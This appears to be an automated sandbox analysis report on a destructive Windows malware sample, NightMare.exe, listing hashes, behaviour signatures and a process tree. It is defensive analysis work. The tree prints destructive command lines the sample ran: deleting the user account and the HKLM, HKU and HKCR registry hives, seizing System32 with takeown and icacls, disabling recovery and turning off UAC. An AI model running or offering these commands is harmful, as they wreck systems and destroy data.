Overview (score per task)
Overview: 10
Static: 7
MyMalwareD...og.exe (windows7-x64): 7
MyMalwareD...og.exe (windows10-2004-x64): 7
$1/1337/Frog.exe (windows7-x64): 3
$1/1337/Frog.exe (windows10-2004-x64): 3
$1/1337/php5ts.dll (windows7-x64): 1
$1/1337/php5ts.dll (windows10-2004-x64): 1
$PLUGINSDI...em.dll (windows7-x64): 3
$PLUGINSDI...em.dll (windows10-2004-x64): 3
MyMalwareD...ry.exe (windows7-x64): 1
MyMalwareD...ry.exe (windows10-2004-x64): 1
MyMalwareD...1).exe (windows7-x64): 7
MyMalwareD...1).exe (windows10-2004-x64): 7
MyMalwareD...ge.exe (windows7-x64): 1
MyMalwareD...ge.exe (windows10-2004-x64): 1
MyMalwareD...64.exe (windows7-x64): 1
MyMalwareD...64.exe (windows10-2004-x64): 1
MyMalwareD...re.exe (windows7-x64): 10
MyMalwareD...re.exe (windows10-2004-x64): 10
MyMalwareD...ck.bat (windows7-x64): 1
MyMalwareD...ck.bat (windows10-2004-x64): 1
MyMalwareD...1).exe (windows7-x64): 1
MyMalwareD...1).exe (windows10-2004-x64): no score shown
MyMalwareD...1).exe (windows7-x64): 8
MyMalwareD...1).exe (windows10-2004-x64): 8
MyMalwareD...rn.exe (windows7-x64): 3
MyMalwareD...rn.exe (windows10-2004-x64): 3
Sulfoxide/...de.exe (windows7-x64): no score shown
Sulfoxide/...de.exe (windows10-2004-x64): no score shown
Sulfoxide/...es.exe (windows7-x64): no score shown
Sulfoxide/...es.exe (windows10-2004-x64): no score shown
Sulfoxide/...64.exe (windows7-x64): 7
Sulfoxide/...64.exe (windows10-2004-x64): 7

Analysis
max time kernel: 142s
max time network: 122s
platform: windows7_x64
resource: win7-20240220-en
resource tags: arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
submitted: 02-03-2024 20:38
Behavioral tasks (sample, resource)
behavioral1: MyMalwareDatabase-main/MyMalwareDatabase-main/Frog.exe (win7-20240221-en)
behavioral2: MyMalwareDatabase-main/MyMalwareDatabase-main/Frog.exe (win10v2004-20240226-en)
behavioral3: $1/1337/Frog.exe (win7-20240221-en)
behavioral4: $1/1337/Frog.exe (win10v2004-20240226-en)
behavioral5: $1/1337/php5ts.dll (win7-20240221-en)
behavioral6: $1/1337/php5ts.dll (win10v2004-20240226-en)
behavioral7: $PLUGINSDIR/System.dll (win7-20240221-en)
behavioral8: $PLUGINSDIR/System.dll (win10v2004-20240226-en)
behavioral9: MyMalwareDatabase-main/MyMalwareDatabase-main/GonnaCry/GonnaCry.exe (win7-20240221-en)
behavioral10: MyMalwareDatabase-main/MyMalwareDatabase-main/GonnaCry/GonnaCry.exe (win10v2004-20240226-en)
behavioral11: MyMalwareDatabase-main/MyMalwareDatabase-main/Hydromatic (1).exe (win7-20240221-en)
behavioral12: MyMalwareDatabase-main/MyMalwareDatabase-main/Hydromatic (1).exe (win10v2004-20240226-en)
behavioral13: MyMalwareDatabase-main/MyMalwareDatabase-main/Losange/Losange.exe (win7-20240221-en)
behavioral14: MyMalwareDatabase-main/MyMalwareDatabase-main/Losange/Losange.exe (win10v2004-20240226-en)
behavioral15: MyMalwareDatabase-main/MyMalwareDatabase-main/Monoxidex64.exe (win7-20240221-en)
behavioral16: MyMalwareDatabase-main/MyMalwareDatabase-main/Monoxidex64.exe (win10v2004-20240226-en)
behavioral17: MyMalwareDatabase-main/MyMalwareDatabase-main/NightMare/NightMare.exe (win7-20240220-en)
behavioral18: MyMalwareDatabase-main/MyMalwareDatabase-main/NightMare/NightMare.exe (win10v2004-20240226-en)
behavioral19: MyMalwareDatabase-main/MyMalwareDatabase-main/NightMare/REGFuck.bat (win7-20240221-en)
behavioral20: MyMalwareDatabase-main/MyMalwareDatabase-main/NightMare/REGFuck.bat (win10v2004-20240226-en)
behavioral21: MyMalwareDatabase-main/MyMalwareDatabase-main/NoEscape (1).exe (win7-20240221-en)
behavioral22: MyMalwareDatabase-main/MyMalwareDatabase-main/NoEscape (1).exe (win10v2004-20240226-en)
behavioral23: MyMalwareDatabase-main/MyMalwareDatabase-main/Protactinium (1).exe (win7-20240221-en)
behavioral24: MyMalwareDatabase-main/MyMalwareDatabase-main/Protactinium (1).exe (win10v2004-20240226-en)
behavioral25: MyMalwareDatabase-main/MyMalwareDatabase-main/Saturn.exe (win7-20240221-en)
behavioral26: MyMalwareDatabase-main/MyMalwareDatabase-main/Saturn.exe (win10v2004-20240226-en)
behavioral27: Sulfoxide/Sulfoxide.exe (win7-20240215-en)
behavioral28: Sulfoxide/Sulfoxide.exe (win10v2004-20240226-en)
behavioral29: Sulfoxide/Sulfoxide_fixes.exe (win7-20240221-en)
behavioral30: Sulfoxide/Sulfoxide_fixes.exe (win10v2004-20240226-en)
behavioral31: Sulfoxide/vcredist_x64.exe (win7-20240221-en)
behavioral32: Sulfoxide/vcredist_x64.exe (win10v2004-20240226-en)
General
Target: MyMalwareDatabase-main/MyMalwareDatabase-main/NightMare/NightMare.exe
Size: 42KB
MD5: 4c5dfe827dd3465bb97016996936fe38
SHA1: 010b868fe1a9e637912226a1eda1b73d901347dd
SHA256: 366373109445178df10e219c3d58ea40b435c3cc20f80be7398d199aee01f62b
SHA512: e0692e425b7c702d297c88f0495c3bdae53eb566c3128f334d0e87e90a7047c433633f918ab6163a025a488111bcb2f199df0852b338fdc00e524897a2a7d82e
SSDEEP: 768:73oACIqXSoiSnWsHorfhH7HjVq9HTtYcFA/Vc6K:7TCxNn/orfhbDVqRD8Vcl
Malware Config
Signatures
UAC bypass
Processes:
  NightMare.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Disables RegEdit via registry modification (1 IoCs)
Processes:
  NightMare.exe: Set value (int) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"
Disables Task Manager via registry modification
Possible privilege escalation attempt (18 IoCs)
Processes (pid, process):
  6432 takeown.exe, 2476 takeown.exe, 3480 takeown.exe, 7184 takeown.exe, 8280 takeown.exe, 3284 takeown.exe, 5836 takeown.exe, 592 takeown.exe, 1620 takeown.exe, 4036 takeown.exe, 4508 takeown.exe, 6196 takeown.exe, 7520 takeown.exe, 4608 takeown.exe, 3008 takeown.exe, 2612 icacls.exe, 5692 takeown.exe, 4340 takeown.exe
Modifies file permissions (1 TTPs, 18 IoCs)
Processes (pid, process):
  6196 takeown.exe, 4608 takeown.exe, 4036 takeown.exe, 3284 takeown.exe, 3480 takeown.exe, 7184 takeown.exe, 3008 takeown.exe, 2476 takeown.exe, 4340 takeown.exe, 592 takeown.exe, 6432 takeown.exe, 4508 takeown.exe, 5692 takeown.exe, 7520 takeown.exe, 1620 takeown.exe, 2612 icacls.exe, 5836 takeown.exe, 8280 takeown.exe
Modifies system executable filetype association (2 TTPs, 1 IoCs)
Processes:
  NightMare.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\
Checks whether UAC is enabled
Processes:
  NightMare.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
  NightMare.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Drops file in Windows directory (64 IoCs)
Processes:
  NightMare.exe: File created C:\Windows\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE(N).txt
  All 64 files share that name and differ only in the number N in parentheses, in the order reported:
  7327, 7905, 8453, 8904, 9829, 5801, 6638, 6270, 7288, 8602, 8988, 2827,
  4276, 8526, 9429, 357, 2189, 6165, 8463, 1179, 2492, 7487, 8661, 6176,
  6545, 8707, 9612, 2871, 3612, 9775, 3484, 3910, 2124, 2234, 2550, 3277,
  4538, 6340, 316, 1335, 8879, 9163, 1201, 6133, 3242, 3783, 7431, 7946,
  8359, 6269, 6941, 2178, 8917, 4792, 844, 3274, 1852, 8224, 9945, 953,
  1611, 4442, 5106, 8289
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Kills process with taskkill (3 IoCs)
Processes (pid, process):
  4328 taskkill.exe, 5852 taskkill.exe, 4356 taskkill.exe
Modifies Control Panel (14 IoCs)
Processes:
  NightMare.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\Cursors\<name> = "C:\\Windows\\WinSxS\\amd64_microsoft-windows-shell-cursors_31bf3856ad364e35_10.0.19041.1_none_01289c50fa22c737\\aero_unavail_xl.cur"
  The same cursor file is written to each of these 14 values under Control Panel\Cursors, in the order reported: SizeWE, UpArrow, Wait, No, NWPen, AppStarting, Arrow, SizeNS, SizeNWSE, the unnamed default value (Cursors\), Help, SizeNESW, Hand, SizeAll
Modifies File Icons (3 IoCs)
Processes:
  NightMare.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons
  NightMare.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Shell Icons\3
  NightMare.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Shell Icons\4
Modifies registry class (37 IoCs)
Processes (all entries by NightMare.exe):
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\
  Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon
  Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon
  Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\
  Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon
  Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\
  Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\CLSID
  Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}
  Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\Wow6432Node\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\
  Key created \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon
Modifies registry key (1 TTPs, 1 IoCs)

Runs net.exe
Suspicious use of AdjustPrivilegeToken (29 IoCs)
Processes (token, pid, process):
  SeTakeOwnershipPrivilege 3008 takeown.exe
  SeTakeOwnershipPrivilege 2476 takeown.exe
  SeDebugPrivilege 1948 NightMare.exe
  SeDebugPrivilege 1948 NightMare.exe
  SeTakeOwnershipPrivilege 3284 takeown.exe
  SeDebugPrivilege 1948 NightMare.exe
  SeTakeOwnershipPrivilege 4508 takeown.exe
  SeTakeOwnershipPrivilege 5692 takeown.exe
  SeTakeOwnershipPrivilege 5836 takeown.exe
  SeTakeOwnershipPrivilege 3480 takeown.exe
  SeTakeOwnershipPrivilege 6196 takeown.exe
  SeTakeOwnershipPrivilege 7184 takeown.exe
  SeTakeOwnershipPrivilege 4340 takeown.exe
  SeTakeOwnershipPrivilege 7520 takeown.exe
  SeDebugPrivilege 4356 taskkill.exe
  SeDebugPrivilege 4328 taskkill.exe
  SeDebugPrivilege 5852 taskkill.exe
  SeDebugPrivilege 1948 NightMare.exe
  SeTakeOwnershipPrivilege 4608 takeown.exe
  SeDebugPrivilege 1948 NightMare.exe
  SeTakeOwnershipPrivilege 8280 takeown.exe
  SeDebugPrivilege 1948 NightMare.exe
  SeTakeOwnershipPrivilege 592 takeown.exe
  SeDebugPrivilege 1948 NightMare.exe
  SeTakeOwnershipPrivilege 4036 takeown.exe
  SeDebugPrivilege 1948 NightMare.exe
  SeTakeOwnershipPrivilege 6432 takeown.exe
  SeDebugPrivilege 1948 NightMare.exe
  SeTakeOwnershipPrivilege 1620 takeown.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (source pid/process wrote to memory of target pid/process; each pair is reported 4 times, 16 distinct pairs in the order first seen):
  1948 NightMare.exe -> 1412 cmd.exe
  1948 NightMare.exe -> 1408 cmd.exe
  1948 NightMare.exe -> 3012 cmd.exe
  1948 NightMare.exe -> 2144 cmd.exe
  1948 NightMare.exe -> 2300 cmd.exe
  1948 NightMare.exe -> 3004 cmd.exe
  1948 NightMare.exe -> 2552 cmd.exe
  1412 cmd.exe -> 2860 net.exe
  1408 cmd.exe -> 2804 reg.exe
  2860 net.exe -> 2580 net1.exe
  2300 cmd.exe -> 3008 takeown.exe
  2144 cmd.exe -> 1956 reg.exe
  3012 cmd.exe -> 2816 reg.exe
  2552 cmd.exe -> 2476 takeown.exe
  3004 cmd.exe -> 2964 ReAgentc.exe
  2552 cmd.exe -> 2612 icacls.exe
System policy modification (1 TTPs, 1 IoCs)
Processes:
  NightMare.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Processes
- C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\MyMalwareDatabase-main\NightMare\NightMare.exe (PID 1948): "C:\Users\Admin\AppData\Local\Temp\MyMalwareDatabase-main\MyMalwareDatabase-main\NightMare\NightMare.exe"
  Tags: UAC bypass; Disables RegEdit via registry modification; Modifies system executable filetype association; Checks whether UAC is enabled; Drops file in Windows directory; Modifies Control Panel; Modifies File Icons; Modifies registry class; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory; System policy modification
  - C:\Windows\SysWOW64\cmd.exe (PID 1412): "C:\Windows\System32\cmd.exe" /k net user %username% /delete && exit
    Tags: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net.exe (PID 2860): net user Admin /delete
      Tags: Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\net1.exe (PID 2580): C:\Windows\system32\net1 user Admin /delete
  - C:\Windows\SysWOW64\cmd.exe (PID 1408): "C:\Windows\System32\cmd.exe" /k reg delete HKCR && exit
    Tags: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\reg.exe (PID 2804): reg delete HKCR
  - C:\Windows\SysWOW64\cmd.exe (PID 3012): "C:\Windows\System32\cmd.exe" /k reg delete HKU && exit
    Tags: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\reg.exe (PID 2816): reg delete HKU
  - C:\Windows\SysWOW64\cmd.exe (PID 2144): "C:\Windows\System32\cmd.exe" /k reg delete HKLM && exit
    Tags: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\reg.exe (PID 1956): reg delete HKLM
      Tags: Modifies registry key
  - C:\Windows\SysWOW64\cmd.exe (PID 2300): "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
    Tags: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\takeown.exe (PID 3008): takeown /F C:\Windows\Boot\DVD\EFI
      Tags: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 3004): "C:\Windows\System32\cmd.exe" /k reagentc.exe /disable && pause
    Tags: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\ReAgentc.exe (PID 2964): reagentc.exe /disable
  - C:\Windows\SysWOW64\cmd.exe (PID 2552): "C:\Windows\System32\cmd.exe" /k color 47 && takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && Exit
    Tags: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\takeown.exe (PID 2476): takeown /f C:\Windows\System32
      Tags: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\icacls.exe (PID 2612): icacls C:\Windows\System32 /grant Admin:F
      Tags: Possible privilege escalation attempt; Modifies file permissions
  - C:\Windows\SysWOW64\cmd.exe (PID 6912): "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
    - C:\Windows\SysWOW64\takeown.exe (PID 3284): takeown /F C:\Windows\Boot\DVD\EFI
      Tags: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 7256): "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
    - C:\Windows\SysWOW64\takeown.exe (PID 4508): takeown /F C:\Windows\Boot\DVD\EFI
      Tags: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 1604): "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\taskmgr.exe && pause
    - C:\Windows\SysWOW64\takeown.exe (PID 6196): takeown /F C:\Windows\system32\taskmgr.exe
      Tags: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 4676): "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\LogonUI.exe && pause
    - C:\Windows\SysWOW64\takeown.exe (PID 3480): takeown /F C:\Windows\system32\LogonUI.exe
      Tags: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 5136): "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\BCD && pause
    - C:\Windows\SysWOW64\takeown.exe (PID 5692): takeown /F C:\Windows\Boot\DVD\EFI\BCD
      Tags: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 3456): "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi && pause
    - C:\Windows\SysWOW64\takeown.exe (PID 4340): takeown /F C:\Windows\Boot\DVD\EFI\boot.sdi
      Tags: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 7720): "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\system32\drivers && pause
    - C:\Windows\SysWOW64\takeown.exe (PID 7184): takeown /F C:\Windows\system32\drivers
      Tags: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 5904): "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\servicing\TrustedInstaller.exe && pause
    - C:\Windows\SysWOW64\takeown.exe (PID 7520): takeown /F C:\Windows\servicing\TrustedInstaller.exe
      Tags: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 4140): "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\System32\WUDFHost.exe && pause
    - C:\Windows\SysWOW64\takeown.exe (PID 5836): takeown /F C:\Windows\System32\WUDFHost.exe
      Tags: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\taskkill.exe (PID 5852): "C:\Windows\System32\taskkill.exe" /IM fontdrvhost.exe /F
    Tags: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\taskkill.exe (PID 4328): "C:\Windows\System32\taskkill.exe" /IM dwm.exe.exe /F
    Tags: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\taskkill.exe (PID 4356): "C:\Windows\System32\taskkill.exe" /IM TrustedInstaller.exe.exe /F
    Tags: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 8996): "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
    - C:\Windows\SysWOW64\takeown.exe (PID 4608): takeown /F C:\Windows\Boot\DVD\EFI
      Tags: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 4168): "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
    - C:\Windows\SysWOW64\takeown.exe (PID 8280): takeown /F C:\Windows\Boot\DVD\EFI
      Tags: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 6892): "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
    - C:\Windows\SysWOW64\takeown.exe (PID 592): takeown /F C:\Windows\Boot\DVD\EFI
      Tags: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 3916): "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
    - C:\Windows\SysWOW64\takeown.exe (PID 4036): takeown /F C:\Windows\Boot\DVD\EFI
      Tags: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 5452): "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
    - C:\Windows\SysWOW64\takeown.exe (PID 6432): takeown /F C:\Windows\Boot\DVD\EFI
      Tags: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\cmd.exe (PID 7176): "C:\Windows\System32\cmd.exe" /k takeown /F C:\Windows\Boot\DVD\EFI && pause
    - C:\Windows\SysWOW64\takeown.exe (PID 1620): takeown /F C:\Windows\Boot\DVD\EFI
      Tags: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
- Abuse Elevation Control Mechanism 1
  - Bypass User Account Control 1
- Event Triggered Execution 1
  - Change Default File Association 1
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE_NO_ESCAPE.txt
  Filesize: 662B
  MD5: 21ad42bd4156f914d3a265823a1c269c
  SHA1: 4129bc994a0947b38e3bac2aeabc8e2fbdbd503f
  SHA256: 680671bac3f22a5f19ffbd2c82eec069a32844cf93d419aa59319cd0cbc98ac2
  SHA512: 7ec8c3801798b4fd547578d31badd96edeaacf0a91dca807c04e40ad65d97592043cb8e747947f74b9850f8e99dcd1c8f1c311cb0f8b79be301be36ca884cc5a